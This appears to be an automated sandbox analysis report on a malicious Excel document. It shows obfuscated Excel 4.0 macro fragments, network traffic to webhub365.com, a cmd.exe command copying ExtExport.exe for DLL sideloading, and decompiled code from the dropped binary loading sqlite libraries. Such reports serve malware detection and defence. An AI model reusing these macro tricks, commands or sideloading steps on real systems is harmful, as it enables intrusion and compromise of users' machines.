,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,F,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,I,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,6,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,E,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,mxUXwaSU= $F$204&$H$481&$K$324&$N$11&$N$11&$E$78&$I$228,,,,,,,,,,,,,,,,,,,,,,id9nB5my= $D$167,,,,,,,,,,,,,,,,,,,,,,=$F$105(),,,,,,,,,,,,,,,,,,,,,,=RUN($R$247),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,!,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 10, 2021 23:34:00.519025087 CEST	49165	443	192.168.2.22	198.244.146.96
Jun 10, 2021 23:34:00.574651003 CEST	443	49165	198.244.146.96	192.168.2.22
Jun 10, 2021 23:34:00.574824095 CEST	49165	443	192.168.2.22	198.244.146.96
Jun 10, 2021 23:34:00.583688021 CEST	49165	443	192.168.2.22	198.244.146.96
Jun 10, 2021 23:34:00.641762972 CEST	443	49165	198.244.146.96	192.168.2.22
Jun 10, 2021 23:34:00.642704010 CEST	443	49165	198.244.146.96	192.168.2.22
Jun 10, 2021 23:34:00.642745972 CEST	443	49165	198.244.146.96	192.168.2.22
Jun 10, 2021 23:34:00.642785072 CEST	443	49165	198.244.146.96	192.168.2.22
Jun 10, 2021 23:34:00.642822027 CEST	443	49165	198.244.146.96	192.168.2.22
Jun 10, 2021 23:34:00.642864943 CEST	49165	443	192.168.2.22	198.244.146.96
Jun 10, 2021 23:34:00.642910004 CEST	49165	443	192.168.2.22	198.244.146.96
Jun 10, 2021 23:34:00.649437904 CEST	443	49165	198.244.146.96	192.168.2.22
Jun 10, 2021 23:34:00.649539948 CEST	49165	443	192.168.2.22	198.244.146.96
Jun 10, 2021 23:34:00.671739101 CEST	49165	443	192.168.2.22	198.244.146.96
Jun 10, 2021 23:34:00.731216908 CEST	443	49165	198.244.146.96	192.168.2.22
Jun 10, 2021 23:34:00.731369019 CEST	49165	443	192.168.2.22	198.244.146.96
Jun 10, 2021 23:34:02.298217058 CEST	49165	443	192.168.2.22	198.244.146.96
Jun 10, 2021 23:34:02.399111032 CEST	443	49165	198.244.146.96	192.168.2.22
Jun 10, 2021 23:34:02.481760025 CEST	443	49165	198.244.146.96	192.168.2.22
Jun 10, 2021 23:34:02.481996059 CEST	49165	443	192.168.2.22	198.244.146.96
Jun 10, 2021 23:35:17.483716965 CEST	443	49165	198.244.146.96	192.168.2.22
Jun 10, 2021 23:35:17.483767986 CEST	443	49165	198.244.146.96	192.168.2.22
Jun 10, 2021 23:35:17.483977079 CEST	49165	443	192.168.2.22	198.244.146.96
Jun 10, 2021 23:35:17.484005928 CEST	49165	443	192.168.2.22	198.244.146.96
Jun 10, 2021 23:36:00.282746077 CEST	49165	443	192.168.2.22	198.244.146.96
Jun 10, 2021 23:36:00.282870054 CEST	49165	443	192.168.2.22	198.244.146.96
Jun 10, 2021 23:36:00.338169098 CEST	443	49165	198.244.146.96	192.168.2.22
Jun 10, 2021 23:36:00.338419914 CEST	49165	443	192.168.2.22	198.244.146.96

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 10, 2021 23:34:00.419603109 CEST	52197	53	192.168.2.22	8.8.8.8
Jun 10, 2021 23:34:00.490926981 CEST	53	52197	8.8.8.8	192.168.2.22
Jun 10, 2021 23:34:01.008934975 CEST	53099	53	192.168.2.22	8.8.8.8
Jun 10, 2021 23:34:01.061711073 CEST	53	53099	8.8.8.8	192.168.2.22
Jun 10, 2021 23:34:01.074537039 CEST	52838	53	192.168.2.22	8.8.8.8
Jun 10, 2021 23:34:01.136795044 CEST	53	52838	8.8.8.8	192.168.2.22
Jun 10, 2021 23:34:01.704233885 CEST	61200	53	192.168.2.22	8.8.8.8
Jun 10, 2021 23:34:01.759402037 CEST	53	61200	8.8.8.8	192.168.2.22
Jun 10, 2021 23:34:01.766458988 CEST	49548	53	192.168.2.22	8.8.8.8
Jun 10, 2021 23:34:01.830002069 CEST	53	49548	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 10, 2021 23:34:00.419603109 CEST	192.168.2.22	8.8.8.8	0x78b6	Standard query (0)	webhub365.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 10, 2021 23:34:00.490926981 CEST	8.8.8.8	192.168.2.22	0x78b6	No error (0)	webhub365.com		198.244.146.96	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jun 10, 2021 23:34:00.649437904 CEST	198.244.146.96	443	192.168.2.22	49165	CN=webhub365.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Tue Jun 08 19:53:43 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021	Mon Sep 06 19:53:43 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
					CN=R3, O=Let's Encrypt, C=US	CN=ISRG Root X1, O=Internet Security Research Group, C=US	Fri Sep 04 02:00:00 CEST 2020	Mon Sep 15 18:00:00 CEST 2025
					CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Jan 20 20:14:03 CET 2021	Mon Sep 30 20:14:03 CEST 2024

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 1204 Parent PID: 584

General

Start time:	23:33:34
Start date:	10/06/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fbd0000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2668 Parent PID: 1204

General

Start time:	23:33:39
Start date:	10/06/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe
Imagebase:	0x4a9f0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: nnAzot.exe PID: 2628 Parent PID: 1204

General

Start time:	23:33:41
Start date:	10/06/2021
Path:	C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe
Wow64 process (32bit):	true
Commandline:	'C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe' C:\aZ8ThU0Y\ERdZMUem GdPT AuMr7
Imagebase:	0xc80000
File size:	25600 bytes
MD5 hash:	7F7F391491C315A4A72EFCAC0D34FA93
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, Virustotal, Browse Detection: 2%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: nnAzot.exe PID: 2628 Parent PID: 1204 nnAzot.exeCOMMON

Executed Functions

Function 00C8230E, Relevance: 70.1, APIs: 20, Strings: 20, Instructions: 146
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00C8230E(void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				short _v528;
				short _v1048;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t19;
				_Unknown_base(*)()* _t24;
				CHAR* _t46;
				void* _t49;
				signed int _t50;
				signed int _t52;

				_t49 = __edx;
				_v8 =  *0xc86004 ^ _t52;
				_t51 = _a4;
				_push(L"mozcrt19.dll");
				_t50 = 0x80004005;
				E00C82225( &_v1048, 0x104, L"%s\\%s", _a4);
				_push(L"mozsqlite3.dll");
				E00C82225( &_v528, 0x104, L"%s\\%s", _a4);
				_t46 = LoadLibraryExW;
				_t17 = LoadLibraryExW( &_v1048, 0, 0); // executed
				 *0xc8644c = _t17;
				_t19 = LoadLibraryExW( &_v528, 0, 0x1100); // executed
				 *0xc86448 = _t19;
				if(_t19 != 0) {
					L2:
					_t51 = GetProcAddress;
					 *0xc8656c = GetProcAddress(_t19, "sqlite3_open");
					 *0xc86670 = GetProcAddress( *0xc86448, "sqlite3_open_v2");
					 *0xc86570 = GetProcAddress( *0xc86448, "sqlite3_open16");
					 *0xc86530 = GetProcAddress( *0xc86448, "sqlite3_exec");
					_t24 = GetProcAddress( *0xc86448, "sqlite3_free");
					_t46 = "sqlite3_close";
					 *0xc8653c = _t24;
					 *0xc86494 = GetProcAddress( *0xc86448, _t46);
					 *0xc86624 = GetProcAddress( *0xc86448, "sqlite3_prepare_v2");
					 *0xc86628 = GetProcAddress( *0xc86448, "sqlite3_prepare16_v2");
					 *0xc864ac = GetProcAddress( *0xc86448, "sqlite3_column_count");
					 *0xc864c4 = GetProcAddress( *0xc86448, "sqlite3_column_int");
					 *0xc864c8 = GetProcAddress( *0xc86448, "sqlite3_column_int64");
					 *0xc864e4 = GetProcAddress( *0xc86448, "sqlite3_column_text");
					 *0xc864e8 = GetProcAddress( *0xc86448, "sqlite3_column_text16");
					 *0xc865cc = GetProcAddress( *0xc86448, "sqlite3_step");
					 *0xc86588 = GetProcAddress( *0xc86448, "sqlite3_reset");
					 *0xc86538 = GetProcAddress( *0xc86448, "sqlite3_finalize");
					 *0xc86494 = GetProcAddress( *0xc86448, _t46);
					if( *0xc86448 != 0) {
						asm("sbb eax, eax");
						_t50 = _t50 &  !( ~( *0xc86570));
					}
					L4:
					return E00C84AAD(_t50, _t46, _v8 ^ _t52, _t49, _t50, _t51);
				}
				_push(L"sqlite3.dll");
				E00C82225( &_v528, 0x104, L"%s\\%s", _t51);
				_t19 = LoadLibraryExW( &_v528, 0, 0x1100); // executed
				 *0xc86448 = _t19;
				if(_t19 == 0) {
					goto L4;
				}
				goto L2;
			}

0x00c8230e
0x00c82320
0x00c82325
0x00c8232f
0x00c8233a
0x00c82346
0x00c8234b
0x00c8235e
0x00c82363
0x00c82377
0x00c8237e
0x00c8238c
0x00c8238e
0x00c82395
0x00c823d3
0x00c823d3
0x00c823ec
0x00c823fe
0x00c82410
0x00c82422
0x00c82427
0x00c82429
0x00c8242e
0x00c82447
0x00c82459
0x00c8246b
0x00c8247d
0x00c8248f
0x00c824a1
0x00c824b3
0x00c824c5
0x00c824d7
0x00c824e9
0x00c824f7
0x00c82505
0x00c8250a
0x00c82513
0x00c82517
0x00c82517
0x00c82519
0x00c8252b
0x00c8252b
0x00c82397
0x00c823ae
0x00c823c4
0x00c823c6
0x00c823cd
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00C82225: _vsnwprintf.MSVCRT ref: 00C82257

LoadLibraryExW.KERNELBASE(?,00000000,00000000), ref: 00C82377
LoadLibraryExW.KERNELBASE(?,00000000,00001100), ref: 00C8238C
LoadLibraryExW.KERNELBASE(?,00000000,00001100), ref: 00C823C4
GetProcAddress.KERNEL32(00000000,sqlite3_open), ref: 00C823DF
GetProcAddress.KERNEL32(sqlite3_open_v2), ref: 00C823F1
GetProcAddress.KERNEL32(sqlite3_open16), ref: 00C82403
GetProcAddress.KERNEL32(sqlite3_exec), ref: 00C82415
GetProcAddress.KERNEL32(sqlite3_free), ref: 00C82427
GetProcAddress.KERNEL32(sqlite3_close), ref: 00C8243A
GetProcAddress.KERNEL32(sqlite3_prepare_v2), ref: 00C8244C
GetProcAddress.KERNEL32(sqlite3_prepare16_v2), ref: 00C8245E
GetProcAddress.KERNEL32(sqlite3_column_count), ref: 00C82470
GetProcAddress.KERNEL32(sqlite3_column_int), ref: 00C82482
GetProcAddress.KERNEL32(sqlite3_column_int64), ref: 00C82494
GetProcAddress.KERNEL32(sqlite3_column_text), ref: 00C824A6
GetProcAddress.KERNEL32(sqlite3_column_text16), ref: 00C824B8
GetProcAddress.KERNEL32(sqlite3_step), ref: 00C824CA
GetProcAddress.KERNEL32(sqlite3_reset), ref: 00C824DC
GetProcAddress.KERNEL32(sqlite3_finalize), ref: 00C824EE
GetProcAddress.KERNEL32(sqlite3_close), ref: 00C824FC

Strings

sqlite3_open, xrefs: 00C823D9
%s\%s, xrefs: 00C82335, 00C8233F, 00C82351, 00C8239D
sqlite3_finalize, xrefs: 00C824DE
sqlite3_column_text, xrefs: 00C82496
mozsqlite3.dll, xrefs: 00C8234B
sqlite3_open16, xrefs: 00C823F3
sqlite3_close, xrefs: 00C82429, 00C82433, 00C824F0
mozcrt19.dll, xrefs: 00C8232F
sqlite3.dll, xrefs: 00C82397
sqlite3_column_text16, xrefs: 00C824A8
sqlite3_prepare16_v2, xrefs: 00C8244E
sqlite3_reset, xrefs: 00C824CC
sqlite3_free, xrefs: 00C82417
sqlite3_open_v2, xrefs: 00C823E1
sqlite3_exec, xrefs: 00C82405
sqlite3_column_count, xrefs: 00C82460
sqlite3_prepare_v2, xrefs: 00C8243C
sqlite3_column_int64, xrefs: 00C82484
sqlite3_column_int, xrefs: 00C82472
sqlite3_step, xrefs: 00C824BA

Memory Dump Source

Source File: 00000005.00000002.2089471781.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000005.00000002.2089460296.0000000000C80000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2089487211.0000000000C87000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad$_vsnwprintf
String ID: %s\%s$mozcrt19.dll$mozsqlite3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_count$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_column_text16$sqlite3_exec$sqlite3_finalize$sqlite3_free$sqlite3_open$sqlite3_open16$sqlite3_open_v2$sqlite3_prepare16_v2$sqlite3_prepare_v2$sqlite3_reset$sqlite3_step
API String ID: 2176504369-1379368381
Opcode ID: 10e30fa3ffec342c37c9ea7eb43d50a108429ba0b5c59d0fc73538e1d9b8c1dc
Instruction ID: 3a4ebfe118c3b6d3132e8920503f9261dfcb2f5547abb5ec331b0a2fc0e90dc4
Opcode Fuzzy Hash: 10e30fa3ffec342c37c9ea7eb43d50a108429ba0b5c59d0fc73538e1d9b8c1dc
Instruction Fuzzy Hash: 1C513FB4D41318AECB10EF71AC4AF4F3FA8E744768F140426B9049B2A1E675D491CF6D

Uniqueness

Uniqueness Score: -1.00%

Function 00C84BBA, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C84BBA() {

				SetUnhandledExceptionFilter(E00C84B72); // executed
				return 0;
			}

0x00c84bbf
0x00c84bc7

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00C84BBF

Memory Dump Source

Source File: 00000005.00000002.2089471781.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000005.00000002.2089460296.0000000000C80000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2089487211.0000000000C87000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 146e04d2120c8aeb7928d614923520ad7768d65271d42b1f663eaa5068705e25
Instruction ID: 2dea81ac9845e687760af2bb14281bb0ff3156d2b271a3a40ee61d7f914c04dd
Opcode Fuzzy Hash: 146e04d2120c8aeb7928d614923520ad7768d65271d42b1f663eaa5068705e25
Instruction Fuzzy Hash: 459002702955014746082BB15D0975926D46A5960A75115A47241D8054EB54C0045719

Uniqueness

Uniqueness Score: -1.00%

Function 00C8490B, Relevance: 12.1, APIs: 8, Instructions: 96
sleepCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00C8490B() {
				int _t11;
				intOrPtr _t14;
				intOrPtr _t19;
				void* _t20;
				intOrPtr* _t23;
				void* _t34;
				intOrPtr _t35;
				void* _t36;
				intOrPtr _t37;
				intOrPtr _t39;
				void* _t41;
				void* _t54;

				_push(0xc);
				_push(0xc85100);
				E00C84EC4(_t20, _t34, _t36);
				 *((intOrPtr*)(_t41 - 4)) = 0;
				_t37 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t35 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t37) {
						Sleep(0x3e8);
						continue;
					} else {
						_t39 = 1;
						_t35 = 1;
					}
					L6:
					if( *0xc866b0 != _t39) {
						__eflags =  *0xc866b0;
						if(__eflags != 0) {
							 *0xc86044 = _t39;
							goto L12;
						} else {
							 *0xc866b0 = _t39;
							_t19 = E00C84A75(0xc81014, 0xc81020); // executed
							__eflags = _t19;
							if(__eflags == 0) {
								goto L12;
							} else {
								 *((intOrPtr*)(_t41 - 4)) = 0xfffffffe;
								_t11 = 0xff;
								goto L24;
							}
						}
					} else {
						_push(0x1f);
						L00C84C84();
						L12:
						if( *0xc866b0 == _t39) {
							_push(0xc81010);
							_push(0xc81004);
							L00C84EB8();
							 *0xc866b0 = 2;
						}
						if(_t35 == 0) {
							 *0xc866ac = 0;
						}
						_t51 =  *0xc866bc;
						if( *0xc866bc != 0 && E00C84CF0(_t51, 0xc866bc) != 0) {
							 *0xc866bc(0, 2, 0);
						}
						_push( *0xc86050);
						_t11 = E00C831C6(_t54,  *0xc86048,  *0xc8604c); // executed
						 *0xc86040 = _t11;
						if( *0xc86058 != 0) {
							__eflags =  *0xc86044;
							if( *0xc86044 == 0) {
								__imp___cexit();
								_t11 =  *0xc86040;
							}
							 *((intOrPtr*)(_t41 - 4)) = 0xfffffffe;
							L24:
							return E00C84F09(_t11);
						} else {
							exit(_t11); // executed
							_t23 =  *((intOrPtr*)(_t41 - 0x14));
							_t14 =  *((intOrPtr*)( *_t23));
							 *((intOrPtr*)(_t41 - 0x1c)) = _t14;
							_push(_t23);
							_push(_t14);
							L00C84BCE();
							return _t14;
						}
					}
				}
				_t39 = 1;
				__eflags = 1;
				goto L6;
			}

0x00c8490b
0x00c8490d
0x00c84912
0x00c84919
0x00c84922
0x00c84925
0x00c84927
0x00c84930
0x00c84936
0x00000000
0x00000000
0x00c8493a
0x00c84948
0x00000000
0x00c8493c
0x00c8493e
0x00c8493f
0x00c8493f
0x00c84953
0x00c84959
0x00c84965
0x00c8496b
0x00c84999
0x00000000
0x00c8496d
0x00c8496d
0x00c8497d
0x00c84984
0x00c84986
0x00000000
0x00c84988
0x00c84988
0x00c8498f
0x00000000
0x00c8498f
0x00c84986
0x00c8495b
0x00c8495b
0x00c8495d
0x00c8499f
0x00c849a5
0x00c849a7
0x00c849ac
0x00c849b1
0x00c849b8
0x00c849b8
0x00c849c4
0x00c849cd
0x00c849cd
0x00c849cf
0x00c849d6
0x00c849eb
0x00c849eb
0x00c849f1
0x00c84a03
0x00c84a0b
0x00c84a17
0x00c84a4f
0x00c84a56
0x00c84a58
0x00c84a5e
0x00c84a5e
0x00c84a63
0x00c84a6a
0x00c84a6f
0x00c84a19
0x00c84a1a
0x00c84a20
0x00c84a25
0x00c84a27
0x00c84a2a
0x00c84a2b
0x00c84a2c
0x00c84a33
0x00c84a33
0x00c84a17
0x00c84959
0x00c84952
0x00c84952
0x00000000

APIs

Sleep.KERNEL32(000003E8,00C85100,0000000C), ref: 00C84948
_amsg_exit.MSVCRT ref: 00C8495D
__initterm_e.LIBCMT ref: 00C8497D
_initterm.MSVCRT ref: 00C849B1
__IsNonwritableInCurrentImage.LIBCMT ref: 00C849DD
exit.MSVCRT ref: 00C84A1A
_XcptFilter.MSVCRT ref: 00C84A2C

Memory Dump Source

Source File: 00000005.00000002.2089471781.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000005.00000002.2089460296.0000000000C80000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2089487211.0000000000C87000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentFilterImageNonwritableSleepXcpt__initterm_e_amsg_exit_inittermexit
String ID:
API String ID: 3102234582-0
Opcode ID: b45740f6c99a6472836920f3f877afe329605ed4849e4db2d17e2afe47d7d73b
Instruction ID: b75295e0619ba1d95d1b443411f5ebaec5da551c0c3f367307e0eb205a5a9c64
Opcode Fuzzy Hash: b45740f6c99a6472836920f3f877afe329605ed4849e4db2d17e2afe47d7d73b
Instruction Fuzzy Hash: 30316D71544253EFDB39BF64EC0572E77A8B744729F200229F511AA2E0EB748A41EB5C

Uniqueness

Uniqueness Score: -1.00%

Function 00C831C6, Relevance: 7.6, APIs: 5, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C847E2: GetVersionExA.KERNEL32(00C863A8,00C831E5), ref: 00C847FA

rand_s.MSVCRT ref: 00C8320E
VirtualAlloc.KERNELBASE(00000000,00010000,00002000,00000001), ref: 00C8323A
SHAnsiToUnicode.SHLWAPI(?,?,00000104), ref: 00C8326A
SHAnsiToUnicode.SHLWAPI(00000004,?,00000104), ref: 00C8327B
SHAnsiToUnicode.SHLWAPI(?,?,00000104), ref: 00C8328C

Memory Dump Source

Source File: 00000005.00000002.2089471781.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000005.00000002.2089460296.0000000000C80000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2089487211.0000000000C87000.00000002.00020000.sdmp Download File

Similarity

API ID: AnsiUnicode$AllocVersionVirtualrand_s
String ID:
API String ID: 2672016816-0
Opcode ID: cf707c4e29da88ad42c1833a5de6a5fdc74c8ba6cc10316ccfcf62d0cfdd2586
Instruction ID: ce24454ececeaf4b19d322e2016c6ad0601feb096d578bd839d086669b30dfd2
Opcode Fuzzy Hash: cf707c4e29da88ad42c1833a5de6a5fdc74c8ba6cc10316ccfcf62d0cfdd2586
Instruction Fuzzy Hash: 9F31C871A0024D9AEF21EB64DC44BAF73B9FB44B19F1001A5E515E6052E731DF91CB2C

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00C84DF8, Relevance: 7.6, APIs: 5, Instructions: 53
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C84DF8() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t35;
				signed int _t36;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0xc86004;
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t35 = _v20 ^ _v24.LowPart;
					_t39 = _v8 ^ _t35;
					if(_t39 == 0xbb40e64e || ( *0xc86004 & 0xffff0000) == 0) {
						_t39 = 0xbb40e64f;
					}
					 *0xc86004 = _t39;
					 *0xc86008 =  !_t39;
					return _t35;
				} else {
					_t36 =  !_t23;
					 *0xc86008 = _t36;
					return _t36;
				}
			}

0x00c84e00
0x00c84e04
0x00c84e08
0x00c84e1b
0x00c84e2e
0x00c84e3a
0x00c84e43
0x00c84e4c
0x00c84e5d
0x00c84e64
0x00c84e6d
0x00c84e73
0x00c84e77
0x00c84e81
0x00c84e81
0x00c84e86
0x00c84e8e
0x00000000
0x00c84e21
0x00c84e21
0x00c84e23
0x00000000
0x00c84e23

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00C84E2E
GetCurrentProcessId.KERNEL32 ref: 00C84E3D
GetCurrentThreadId.KERNEL32 ref: 00C84E46
GetTickCount.KERNEL32 ref: 00C84E4F
QueryPerformanceCounter.KERNEL32(?), ref: 00C84E64

Memory Dump Source

Source File: 00000005.00000002.2089471781.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000005.00000002.2089460296.0000000000C80000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2089487211.0000000000C87000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 24def3c02e488d4a0135b2481d0102d69450a77538f6cf07e9cb7d4d443e7792
Instruction ID: 9c453f7ae6e637d73395c5637f5be659967e94d8c434e6039051e9d9813d1578
Opcode Fuzzy Hash: 24def3c02e488d4a0135b2481d0102d69450a77538f6cf07e9cb7d4d443e7792
Instruction Fuzzy Hash: 6A115871D05209EBCF14DFB4DA587AEBBF4FB08315F61456AE406EB250EB309A008B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00C84F4C, Relevance: 6.0, APIs: 4, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C84F4C(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00c84f53
0x00c84f5c
0x00c84f75

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00C84F53
UnhandledExceptionFilter.KERNEL32(00C85087), ref: 00C84F5C
GetCurrentProcess.KERNEL32(C0000409,?,00C85087,00C81068), ref: 00C84F67
TerminateProcess.KERNEL32(00000000,?,00C85087,00C81068), ref: 00C84F6E

Memory Dump Source

Source File: 00000005.00000002.2089471781.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000005.00000002.2089460296.0000000000C80000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2089487211.0000000000C87000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 6cd7c71f995cc3f60cb80a35ff1891858fe2b65e74dab39264532e90be818786
Instruction ID: 8b2d58a00dd36b9868df55ade52ef002618dd3e411bd1c6fe52a0308b8cc0d3f
Opcode Fuzzy Hash: 6cd7c71f995cc3f60cb80a35ff1891858fe2b65e74dab39264532e90be818786
Instruction Fuzzy Hash: F6D0C932008504ABD7002BF1FD0CB5D3F28FB45292F240240F31986060EB3BC4018B59

Uniqueness

Uniqueness Score: -1.00%

Function 00C847E2, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C847E2() {
				void* _t1;
				int _t2;

				if( *0xc863a4 == 0) {
					0xc863a8->dwOSVersionInfoSize = 0x9c;
					_t2 = GetVersionExA(0xc863a8);
					 *0xc863a4 = 1;
					return _t2;
				}
				return _t1;
			}

0x00c847e9
0x00c847f0
0x00c847fa
0x00c84800
0x00000000
0x00c84800
0x00c84807

APIs

GetVersionExA.KERNEL32(00C863A8,00C831E5), ref: 00C847FA

Memory Dump Source

Source File: 00000005.00000002.2089471781.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000005.00000002.2089460296.0000000000C80000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2089487211.0000000000C87000.00000002.00020000.sdmp Download File

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 40b0fdfeea3e7a1572837730a5eb0f3adfabe28024da480c1313c5b08c4cfae9
Instruction ID: 7e4b2ccabaa7a4d4d0648b47723ed06676b3e9b8f2b63f9594194255e7711e24
Opcode Fuzzy Hash: 40b0fdfeea3e7a1572837730a5eb0f3adfabe28024da480c1313c5b08c4cfae9
